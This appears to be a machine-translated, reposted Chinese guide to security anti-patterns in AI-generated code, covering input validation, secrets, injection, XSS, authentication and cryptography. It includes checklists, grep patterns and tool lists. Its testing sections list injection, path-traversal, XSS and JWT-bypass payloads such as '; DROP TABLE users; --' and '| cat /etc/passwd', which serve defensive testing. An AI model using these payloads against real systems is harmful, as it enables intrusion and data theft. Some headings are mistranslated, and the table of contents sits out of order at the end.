    (data) => checkRequired(data, ["email", "password"]),
    (data) => checkTypes(data, {email: "string", password: "string"}),
    (data) => checkLength(data.email, 1, 254),
    (data) => checkLength(data.password, 12, 128),
    (data) => checkFormat(data.email, EMAIL_PATTERN),
    (data) => checkPasswordStrength(data.password),
    (data) => checkEmailNotRegistered(data.email)  // Async/DB check
]

function validatePipeline(data, validators):
    for validator in validators:
        result = validator(data)
        if not result.valid:
            return result  // Short-circuit on first failure
    return {valid: true, data: data}

// Usage
result = validatePipeline(requestData, validators)
if not result.valid:
    return error(result.message)
processValidatedData(result.data)

模式 3：声明式字段验证

// Define validation rules per field
FIELD_RULES = {
    "email": {
        required: true,
        type: "string",
        maxLength: 254,
        format: "email",
        transform: (v) => v.toLowerCase().trim()
    },
    "age": {
        required: true,
        type: "integer",
        min: 0,
        max: 150
    },
    "role": {
        required: true,
        type: "string",
        enum: ["user", "admin", "moderator"]
    },
    "tags": {
        required: false,
        type: "array",
        items: {
            type: "string",
            maxLength: 50,
            pattern: "^[a-z0-9-]+$"
        },
        maxItems: 10
    }
}

function validateFields(data, rules):
    result = {}
    errors = []

    for fieldName, fieldRules in rules:
        value = data[fieldName]

        // Required check
        if fieldRules.required and (value is null or value is undefined):
            errors.append({field: fieldName, message: "Required"})
            continue

        // Skip optional empty fields
        if value is null or value is undefined:
            continue

        // Type check
        if typeof(value) != fieldRules.type:
            errors.append({field: fieldName, message: "Invalid type"})
            continue

        // Apply transform if exists
        if fieldRules.transform:
            value = fieldRules.transform(value)

        // Range/length checks based on type
        error = validateFieldConstraints(value, fieldRules)
        if error:
            errors.append({field: fieldName, message: error})
            continue

        result[fieldName] = value

    if errors.length > 0:
        return {valid: false, errors: errors}
    return {valid: true, data: result}

检测提示：如何发现缺失的验证

代码审查模式

// 1. Request body used directly without validation
request.body.xxx      // Search for: request\.body\.\w+
req.params.xxx        // Search for: req\.params\.\w+
request.query.xxx     // Search for: request\.query\.\w+

// 2. Missing null checks before property access
user.profile.address  // Search for: \w+\.\w+\.\w+ (chained access without ?.)
data.items[0]         // Search for: \w+\[\d+\] (hardcoded array index)

// 3. Type coercion without validation
parseInt(xxx)         // Search for: parseInt\([^,]+\) (no radix)
Number(xxx)           // Search for: Number\(\w+
parseFloat(xxx)       // Without subsequent isNaN check

// 4. Regex without anchors
/pattern/             // Search for: /[^/^][^$]+[^$/]/ (no ^ or $)
new RegExp("xxx")     // Search for: new RegExp\("[^^]

// 5. Client-side validation only
if (form.valid)       // Look for validation in frontend, missing in backend
validate()            // In JS files, search corresponding backend endpoint

// 6. Array access from user input
array[userInput]      // Search for: \[\w+\.\w+\] (property access with user data)
object[key]           // Where key comes from request

// GREP patterns for security review:
// request\.(body|params|query)\.\w+
// parseInt\([^,)]+\)(?!\s*,\s*10)
// \.\w+\.\w+\.\w+(?!\?)
// /[^/]+/(?!.*[^\\]\$)

测试模式

// Automated validation testing checklist:

// 1. Boundary testing
- Test with null, undefined, empty string for all fields
- Test with max length + 1 characters
- Test with min - 1 and max + 1 for numeric ranges
- Test with integer overflow values (2^31, 2^32, 2^64)

// 2. Type confusion testing
- Send array where string expected: {"email": ["test@test.com"]}
- Send object where string expected: {"email": {"$gt": ""}}
- Send number where string expected: {"email": 12345}
- Send boolean where string expected: {"email": true}

// 3. Encoding bypass testing
- URL encoding: %00, %2e%2e%2f
- Unicode encoding: \u0000, \u002e
- Double encoding: %2500
- Mixed case: %2E%2e%2F

// 4. Injection payload testing
- SQL: ' OR '1'='1, '; DROP TABLE users; --
- Command: ; ls, | cat /etc/passwd, `whoami`
- Path: ../../../etc/passwd, ....//....//
- XSS: <script>alert(1)</script>, javascript:alert(1)

// 5. ReDoS testing
- For each regex, test with pattern: (valid_char * 30) + invalid_char
- Measure response time - should be < 100ms
- Exponential time indicates ReDoS vulnerability

安全检查清单

所有用户输入均在服务器端进行验证（切勿仅信任客户端验证）
模式验证强制执行预期结构（additionalProperties: false）
所有必填字段均已检查，确保无空值/未定义/空白。
字符串长度已通过合理的最大值进行验证（防止拒绝服务攻击）
数值已针对类型、范围和溢出可能性进行验证
数组已验证是否符合最大长度和项数限制。
枚举字段已根据显式允许列表进行验证
所有以^and为锚点的正则表达式模式$
针对 ReDoS 漏洞测试的正则表达式模式
在正则表达式匹配之前检查长度（ReDoS 防护）
正则表达式操作超时保护（纵深防御）
Unicode 输入在验证前进行规范化（NFC/NFKC）
字符串输入中拒绝空字节（\x00, ）。%00
路径输入已规范化，并根据允许的目录进行验证。
解析并验证 URL 输入（协议、主机，无需凭据）
文件上传通过扩展名和内容类型进行验证
整数运算在计算前会检查是否溢出。
显式类型强制转换并进行适当的错误处理
所有端点验证方式一致（集中式验证器）
错误信息很有用，但不要泄露验证逻辑的细节。
验证规则已记录并进行版本控制
使用模糊测试和边界值进行验证测试

执行摘要

6种关键安全反模式

本文档全面涵盖了人工智能生成代码中最关键、最常见的六种安全漏洞。这些漏洞模式共同构成了人工智能辅助开发中绝大多数安全事件的根本原因。

模式概述

#	图案	风险等级	人工智能频率	主要威胁
1	硬编码的秘密	批判的	非常高	凭证盗窃、API滥用、数据泄露
2	SQL/命令注入	批判的	高的	数据库入侵、远程代码执行、系统接管
3	跨站脚本攻击（XSS）	高的	非常高	会话劫持、账户接管、篡改
4	身份验证/会话	批判的	高的	完全绕过身份验证，权限提升
5	加密故障	高的	非常高	数据解密、凭证泄露、伪造
6	输入验证	高的	非常高	启用所有其他注入攻击

这六种模式为何重要

它们之间相互关联：输入验证失败会导致注入攻击；加密漏洞会暴露原本由硬编码凭证保护的机密信息；身份验证漏洞会使跨站脚本攻击（XSS）更具破坏性。

人工智能模型在所有这些方面都面临挑战：训练数据中包含无数不安全模式的示例。人工智能模型优化的是“可运行的代码”，而不是“安全的代码”。使代码安全的模式通常是不可见的（例如环境变量、参数化查询、正确的编码），而不安全模式则是显式且可见的。

它们会产生叠加效应：一个硬编码的密钥就可能暴露数千名用户；一次 SQL 注入就可能导致整个数据库崩溃；一次 XSS 漏洞就可能跨会话和跨用户持续存在。

关键检查清单：一行提醒

这些简明扼要的检查清单为每种模式提供了快速参考。可在代码审查期间或提交更改之前使用。

模式 1：硬编码的秘密

✓	检查点
□	源文件中不包含 API 密钥、密码或令牌
□	所有密钥均从环境变量或密钥管理器加载
□	`.env`文件中`.gitignore`包含`.env.example`模板
□	日志、错误信息或URL中不包含任何秘密信息。
□	CI/CD 管道中已启用秘密扫描
□	证书定期轮换，且轮换过程自动化。

模式二：SQL/命令注入

✓	检查点
□	所有 SQL 查询均使用参数化语句（不使用字符串拼接）。
□	动态标识符（表/列名）已根据允许列表进行验证
□	审查 ORM 查询是否存在原始查询漏洞
□	Shell 命令避免用户输入；如有必要，请使用允许列表验证。
□	二阶注入已检查（查询中使用的存储数据）
□	预编译语句适用于所有查询类型（SELECT、INSERT、ORDER BY）

模式 3：跨站脚本攻击 (XSS)

✓	检查点
□	HTML 正文上下文的 HTML 编码
□	HTML属性（尤其是事件处理程序）的属性编码
□	JavaScript 内联脚本编码
□	URL 上下文的 URL 编码
□	配置了严格策略的 CSP 标头（否`unsafe-inline`）
□	`innerHTML`避免使用；使用`textContent`或框架安全的绑定。
□	已测试针对突变型 XSS 的清理库

模式 4：身份验证/会话安全

✓	检查点
□	使用 bcrypt/Argon2 哈希算法（而非 MD5/SHA1 算法）对密码进行哈希处理
□	会话令牌采用加密随机化技术生成（熵值超过 256 位）
□	JWT算法已明确验证（`alg: none`被拒绝）
□	存储在 HttpOnly、Secure 和 SameSite Cookie 中的令牌
□	注销时会话失效（服务器端）
□	用于密码/令牌验证的恒定时间比较
□	对身份验证端点进行速率限制

模式 5：加密故障

✓	检查点
□	对称加密采用 AES-256-GCM 或 ChaCha20-Poly1305 算法。
□	每次加密操作都使用新的随机初始化向量/随机数。
□	CSPRNG 用于所有安全敏感的随机值
□	bcrypt/Argon2id 用于密码哈希（而非 PBKDF2 用于密码哈希）
□	密钥派生采用HKDF或PBKDF2，并进行适当的迭代。
□	不使用 ECB 模式，不使用静态 IV，不使用 Math.random()
□	MAC/签名验证的恒定时间比较

模式 6：输入验证

✓	检查点
□	所有验证均在服务器端执行。
□	使用模式验证`additionalProperties: false`
□	所有以`^`and为锚点的正则表达式模式`$`
□	在正则表达式匹配之前，先检查长度限制。
□	字符串输入中拒绝了空字节
□	验证前已进行 Unicode 规范化
□	显式类型强制转换及错误处理

按漏洞类型划分的测试建议

硬编码密钥测试

// Automated Secret Detection
1. Pre-commit hooks with secret scanners:
   - TruffleHog
   - detect-secrets
   - gitleaks
   - git-secrets

2. CI/CD Pipeline Scanning:
   - Run on every PR/MR
   - Scan full git history on merge to main
   - Block deployment on secret detection

3. Runtime Detection:
   - Log analysis for credential patterns
   - API request auditing for hardcoded keys
   - Cloud provider secret exposure alerts

// Testing Checklist
- [ ] Scan all source files for API key patterns
- [ ] Scan all config files for password strings
- [ ] Check git history for past secret commits
- [ ] Verify environment variables are properly loaded
- [ ] Test application behavior when secrets are missing
- [ ] Verify secrets are not exposed in error messages

SQL/命令注入测试

// Automated Testing Tools
1. SAST (Static Analysis):
   - Semgrep with injection rules
   - CodeQL injection queries
   - SonarQube SQL injection checks

2. DAST (Dynamic Analysis):
   - SQLMap for SQL injection
   - Burp Suite active scanning
   - OWASP ZAP automated scan

3. Manual Testing Payloads:
   // SQL Injection
   - Single quote: '
   - Comment: -- or #
   - Boolean: ' OR '1'='1
   - Time-based: '; WAITFOR DELAY '0:0:10'--
   - Union: ' UNION SELECT null,null--

   // Command Injection
   - Semicolon: ;whoami
   - Pipe: |id
   - Backticks: `whoami`
   - Command substitution: $(whoami)
   - Newline: %0a id

// Testing Checklist
- [ ] Test all user input fields with injection payloads
- [ ] Test ORDER BY, LIMIT, table name parameters
- [ ] Test stored data for second-order injection
- [ ] Test file paths for command injection
- [ ] Verify all queries use parameterization
- [ ] Check logs don't reveal injection success/failure

XSS 测试

// Automated Testing
1. Browser Tools:
   - DOM Invader (Burp)
   - XSS Hunter
   - DOMPurify testing mode

2. Automated Scanners:
   - Burp Suite XSS scanner
   - OWASP ZAP active scan
   - Nuclei XSS templates

3. Manual Testing Payloads:
   // HTML Context
   - <script>alert(1)</script>
   - <img src=x onerror=alert(1)>
   - <svg onload=alert(1)>

   // Attribute Context
   - " onmouseover="alert(1)
   - ' onfocus='alert(1)' autofocus='

   // JavaScript Context
   - '-alert(1)-'
   - ';alert(1)//
   - \u003cscript\u003e

   // URL Context
   - javascript:alert(1)
   - data:text/html,<script>alert(1)</script>

// Testing Checklist
- [ ] Test all output points with context-specific payloads
- [ ] Test encoding bypass techniques
- [ ] Test DOM XSS with source/sink analysis
- [ ] Verify CSP headers block inline scripts
- [ ] Test mutation XSS with sanitizer bypass payloads
- [ ] Check for polyglot XSS across contexts

身份验证/会话测试

// Testing Tools
1. Session Analysis:
   - Burp Suite session handling
   - OWASP ZAP session management
   - Custom scripts for token analysis

2. JWT Testing:
   - jwt.io debugger
   - jwt_tool
   - jose library testing

3. Manual Testing:
   // Session Token Analysis
   - Check entropy (should be 256+ bits)
   - Test token predictability
   - Test session fixation

   // JWT Attacks
   - Algorithm confusion (RS256 → HS256)
   - None algorithm bypass
   - Key injection attacks
   - Signature stripping

   // Authentication Bypass
   - SQL injection in login
   - Password reset token prediction
   - OAuth state parameter manipulation

// Testing Checklist
- [ ] Test session token randomness
- [ ] Verify session invalidation on logout
- [ ] Test for session fixation
- [ ] Verify JWT algorithm validation
- [ ] Test rate limiting on login
- [ ] Check for timing attacks on password comparison
- [ ] Test password reset flow for token issues

密码实现测试

// Crypto Testing Tools
1. Static Analysis:
   - Semgrep crypto rules
   - CryptoGuard
   - Crypto-detector

2. Manual Review:
   // Check for weak algorithms:
   grep -r "MD5\|SHA1\|DES\|RC4\|ECB" .

   // Check for static IVs:
   grep -r "iv\s*=\s*[\"'][0-9a-fA-F]+[\"']" .

   // Check for weak randomness:
   grep -r "Math\.random\|random\.random\|rand\(\)" .

3. Runtime Testing:
   - Encrypt same plaintext twice, verify different ciphertext
   - Test key derivation iterations (should take 100ms+)
   - Verify timing consistency in comparisons

// Testing Checklist
- [ ] Verify no MD5/SHA1/DES/RC4/ECB usage
- [ ] Confirm unique IV/nonce per encryption
- [ ] Test password hashing takes appropriate time (100ms+)
- [ ] Verify CSPRNG used for all secrets
- [ ] Check key derivation iteration counts
- [ ] Test for padding oracle vulnerabilities
- [ ] Verify constant-time comparison functions

输入验证测试

// Testing Approach
1. Boundary Testing:
   - Empty strings, null, undefined
   - Max length + 1
   - Integer boundaries (MAX_INT, MIN_INT)
   - Unicode normalization variants

2. Type Confusion:
   - Array where string expected: ["value"]
   - Object where string expected: {"$gt": ""}
   - Number where string expected: 12345
   - Boolean where object expected: true

3. Encoding Bypass:
   - URL encoding: %00, %2e%2e%2f
   - Unicode: \u0000, \ufeff
   - Double encoding: %252e
   - Overlong UTF-8

4. ReDoS Testing:
   - For each regex, test with: (valid_char * 30) + invalid_char
   - Measure response time (should be < 100ms)
   - Use regex-dos-detector tools

// Testing Checklist
- [ ] Test all endpoints with null/empty values
- [ ] Test numeric fields with boundary values
- [ ] Test string fields with max length exceeded
- [ ] Test type confusion for all input fields
- [ ] Test regex patterns for ReDoS
- [ ] Verify server-side validation matches client-side
- [ ] Test Unicode normalization issues

其他模式参考

本深度文档详细介绍了 6 种最关键的安全模式。有关其他安全反模式的介绍，请参阅 [[ANTI_PATTERNS_BREADTH]]，其中包括：

图案类别	涵盖的模式
文件系统安全	路径遍历、不安全的文件上传、不安全的临时文件
访问控制	缺少授权检查、IDOR、权限提升
网络安全	SSRF攻击、不安全的反序列化、未经验证的重定向
错误处理	信息泄露、堆栈跟踪、详细错误
日志记录安全	日志中包含敏感数据，日志记录不完整。
并发性	竞态条件、TOCTOU、僵局
依赖安全	过时的依赖项、恶意占位、篡改锁定文件
配置	生产环境中的调试模式，默认凭据
API 安全性	大量分配、过度数据暴露、速率限制

使用广度文档可以快速查阅多种模式。使用深度文档可以全面理解最关键的模式。

外部资源

OWASP资源

OWASP 前 10 名 (2021)： https: //owasp.org/Top10/
OWASP 速查表系列：
https://cheatsheetseries.owasp.org/
OWASP 测试指南：
https://owasp.org/www-project-web-security-testing-guide/
OWASP ASVS：
https://owasp.org/www-project-application-security-verification-standard/

CWE 参考资料

CWE 2024 年前 25 强：
https://cwe.mitre.org/top25/archive/2024/2024_cwe_top25.html
CWE/SANS Top 25：
https://www.sans.org/top25-software-errors/

本文档的 CWE 映射

图案	原发性 CWEs
硬编码的秘密	CWE-798、CWE-259、CWE-321、CWE-200
SQL注入	CWE-89、CWE-564
命令注入	CWE-78、CWE-77
XSS	CWE-79、CWE-80、CWE-83、CWE-87
验证	CWE-287、CWE-384、CWE-613、CWE-307
会话安全	CWE-384、CWE-613、CWE-614、CWE-1004
加密故障	CWE-327、CWE-328、CWE-329、CWE-338、CWE-916
输入验证	CWE-20、CWE-1333、CWE-185、CWE-176

人工智能代码安全研究

GitHub Copilot 安全分析：
https://arxiv.org/abs/2108.09293
斯坦福大学/键盘上睡着了研究：
https://arxiv.org/abs/2211.03622
USENIX软件包幻觉研究（2024）：
https://www.usenix.org/conference/usenixsecurity24
Veracode 软件安全状况报告（2024-2025）：
https://www.veracode.com/state-of-software-security-report
Snyk开发者安全调查（2024）：
https://snyk.io/reports/

安全测试工具

工具	目的	URL
塞姆格雷普	使用安全规则进行静态分析	https://semgrep.dev
CodeQL	GitHub 安全查询	https://codeql.github.com
松露猪	秘密扫描	https://github.com/trufflesecurity/trufflehog
SQLMap	SQL注入测试	https://sqlmap.org
Burp Suite	网络安全测试	https://portswigger.net/burp
OWASP ZAP	开源网络安全扫描器	https://www.zaproxy.org
jwt_tool	JWT 安全测试	https://github.com/ticarpi/jwt_tool
Git泄露	Git 秘密扫描	https://github.com/gitleaks/gitleaks

文档信息

文档： AI 代码安全反模式：深度版本 版本： 1.0.0 最后更新： 2026-01-18 涵盖模式： 6 种（硬编码密钥、SQL/命令注入、XSS、身份验证/会话、密码学、输入验证）

变更日志

日期	版本	变化
2026-01-18	1.0.0	首发版本包含 6 个全面的模式深度分析

贡献

本文档是人工智能代码安全反模式项目的一部分。安全模式会随着新研究的出现和人工智能模型的更新而不断演变。欢迎就以下方面做出贡献：

新的边界情况和利用技术
更新后的统计数据和研究引用
其他测试方法
框架特定的安全编码示例

本文档旨在包含在 AI 助手上下文窗口中，以提高生成代码的安全性。为达到最佳效果，在审查或生成安全敏感代码时，请将其与 [[ANTI_PATTERNS_BREADTH]] 一起包含。

本文来自网友投稿或网络内容，如有侵犯您的权益请联系我们删除，联系邮箱：wyl860211@qq.com 。

图案	OWASP 速查表
秘密管理	秘密管理速查表
SQL注入	查询参数化速查表
XSS	XSS 防护速查表
验证	身份验证速查表
会话管理	会话管理速查表
密码学	加密存储速查表
输入验证	输入验证速查表

【AI代码安全深度思考】深入剖析人工智能关键代码漏洞的安全指南

目的

为什么要考虑深度？

格式

如何使用本文档

AI/LLM 的使用说明

前7大优先模式

相关文件

模式 1：硬编码密钥和凭证管理

引言：为什么人工智能尤其难以应对这个问题

反面例子：不同的表现形式

错误示例 1：源文件中的 API 密钥

错误示例 2：包含密码的数据库连接字符串

错误示例 3：配置中的 JWT 密钥

错误示例 4：前端代码中的 OAuth 客户端密钥

错误示例 5：将私钥嵌入代码中

优秀范例：正确的模式

优秀示例 1：环境变量的使用

优秀示例 2：密钥管理服务（保险库模式）

优秀示例 3：运行时配置注入

优秀示例 4：安全凭证存储模式

边缘案例部分

极端情况 1：测试凭证泄露到生产环境

极端情况 2：CI/CD 流水线机密泄露

特殊情况 3：Docker/容器密钥处理

极端情况 4：日志记录意外捕获机密信息

常见错误部分

错误 1：.env 文件已提交到 Git

误区二：错误信息中的秘密

错误三：URL（查询参数）中的秘密信息

检测提示：如何在代码审查中发现这种模式

自动检测模式

手动代码审查清单

检测工具

安全检查清单

模式二：SQL注入和命令注入

引言：为什么这种现象在人工智能生成的代码中仍然普遍存在

SQL注入：多个不良示例

错误示例 1：SELECT 语句中的字符串连接

错误示例 2：动态表/列名

错误示例 3：按注射排序

错误示例 4：LIKE 子句注入

反面例子 5：批量/堆叠查询注入

命令注入：多个不良示例

错误示例 1：Shell 命令构造

错误示例 2：命令中的路径操作

错误示例 3：参数注入

错误示例 4：环境变量注入

优秀范例：正确的模式

优秀示例 1：参数化查询（所有主要数据库模式）

优秀示例 2：ORM 安全使用

优秀示例 3：安全的动态表/列名（允许列表）

优秀示例 4：安全命令执行

边缘案例部分

特殊情况 1：二阶注入（先存储后执行）

特殊情况 2：存储过程中的注入

极端情况 3：通过编码旁路注入

常见错误部分

误区一：以为逃跑就足够了

错误二：轻信“内部”数据源

错误 3：部分参数化

检测提示和测试方法

自动检测模式

手动测试方法

代码审查清单

安全检查清单

模式 3：跨站脚本攻击 (XSS)

引言：为什么人工智能经常忽略上下文相关的编码

多个不同语境下的不良示例

错误示例 1：HTML 主体注入

错误示例 2：HTML 属性注入

反面例子 3：JavaScript 上下文注入

错误示例 4：URL 上下文注入

反例 5：CSS 上下文注入

针对每种情境的优秀示例

优秀示例 1：正确的 HTML 编码

优秀示例 2：正确的属性编码

优秀示例 3：JavaScript 编码

优秀示例 4：URL 编码

优秀示例 5：使用安全的 API（textContent 与 innerHTML）